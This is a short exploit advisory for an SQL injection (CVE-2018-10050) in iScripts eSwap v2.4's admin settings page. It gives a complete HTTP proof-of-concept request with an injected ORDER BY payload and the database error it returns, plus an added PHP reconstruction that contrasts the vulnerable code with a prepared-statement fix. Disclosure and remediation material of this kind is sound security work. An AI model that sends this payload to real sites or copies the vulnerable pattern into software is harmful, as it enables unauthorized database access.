CVE-2018-10050

ManhNho Apr 11th, 2018 (edited) 110 Never
# Exploit title: iScripts eSwap v2.4 - SQL injection via the registration_settings.php Admin Panel
# Date: 11/04/2018
# Exploit Author: ManhNho
# Vendor Homepage: https://www.iscripts.com
# Software Link: https://www.iscripts.com/eswap
# Demo Link: https://www.demo.iscripts.com/eswap/demo//admin/adminmain.php
# Version: 2.4
# CVE: CVE-2018-10050
# Tested on: Windows 10 / Kali Linux
# Category: Webapps


#1. Description
-----------------------------------------------------
iScripts eSwap v2.4 has SQL injection via a POST parameter of "registration_settings.php" in the Admin Panel (the "ddlFree" field, as shown in the proof of concept). The database error message is returned in the page, so the injection is error-based and confirmable from a single request.


#2. Proof of Concept
-----------------------------------------------------

Request:

POST /eswap/demo//admin/registration_settings.php?act=post HTTP/1.1
Host: www.demo.iscripts.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.demo.iscripts.com/eswap/demo//admin/registration_settings.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Cookie: __utma=227100805.298811387.1522637403.1523431492.1523438388.8; __utmz=227100805.1522637403.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); messagesUtk=9ae2fcc5306f4d9c8d433f0f58efb968; __utma=129714457.1603653646.1523416273.1523416273.1523433224.2; __utmz=129714457.1523433224.2.2.utmcsr=iscripts.com|utmccn=(referral)|utmcmd=referral|utmcct=/supportdesk/demo.php; PHPSESSID=i3nkqgvua59eplfm18urecqdb1; __utmb=227100805; __utmc=227100805; hs-messages-is-open=false
Connection: close
Upgrade-Insecure-Requests: 1

ddlFree= 1' order by 10 # &txtDate=1

Response:

HTTP/1.1 200 OK
Date: Wed, 11 Apr 2018 10:06:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 2645
...
<div class="clear"></div>
</div>
</div>
Unknown column '10' in 'order clause'
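Added example, not part of the advisory and not eSwap's actual source (which the advisory does not show): a hypothetical PHP reconstruction of the vulnerable pattern that produces the response above, next to a hardened handler that validates the two form fields and binds them with PDO prepared statements. The $pdo connection, the table and column names, and the meaning of ddlFree (a 0/1 dropdown) and txtDate (a day count) are assumptions.

```php
<?php
// Added example: hypothetical reconstruction, NOT eSwap's real code. Assumes $pdo is an
// open PDO connection in ERRMODE_EXCEPTION; table and column names are placeholders.

// Vulnerable pattern: form values interpolated straight into the SQL text.
// A value like  1' order by 10 #  closes the quoted literal, appends an ORDER BY
// clause and comments out the remainder; the database error is then echoed back,
// which is what the response in the advisory shows.
function saveSettingsVulnerable(PDO $pdo): void
{
    $free = $_POST['ddlFree'];
    $days = $_POST['txtDate'];
    $sql  = "UPDATE registration_settings SET free_registration='$free', "
          . "registration_days='$days' WHERE id=1";
    try {
        $pdo->exec($sql);
    } catch (PDOException $e) {
        echo $e->getMessage();   // leaks "Unknown column '10' in 'order clause'"
    }
}

// Hardened handler: accept only what the form can legitimately send, bind the
// values as parameters, and never echo database errors to the client.
function saveSettingsHardened(PDO $pdo): bool
{
    // ddlFree is assumed to be a 0/1 dropdown; txtDate an integer day count.
    $free = filter_input(INPUT_POST, 'ddlFree', FILTER_VALIDATE_INT,
                         ['options' => ['min_range' => 0, 'max_range' => 1]]);
    $days = filter_input(INPUT_POST, 'txtDate', FILTER_VALIDATE_INT,
                         ['options' => ['min_range' => 1]]);
    if (!is_int($free) || !is_int($days)) {   // false (invalid) or null (missing)
        http_response_code(400);              // reject instead of passing it to the DB
        return false;
    }
    // Bound parameters travel separately from the statement text, so a quote or
    // comment marker in the input cannot change the query's structure.
    $stmt = $pdo->prepare('UPDATE registration_settings '
                        . 'SET free_registration = :free, registration_days = :days '
                        . 'WHERE id = 1');
    $stmt->bindValue(':free', $free, PDO::PARAM_INT);
    $stmt->bindValue(':days', $days, PDO::PARAM_INT);
    try {
        return $stmt->execute();
    } catch (PDOException $e) {
        error_log($e->getMessage());  // server-side log only; show the admin a generic error
        http_response_code(500);
        return false;
    }
}
```

With the hardened handler the advisory's request is answered with HTTP 400 before any query runs, and a genuine database failure no longer reveals column or clause names to the browser.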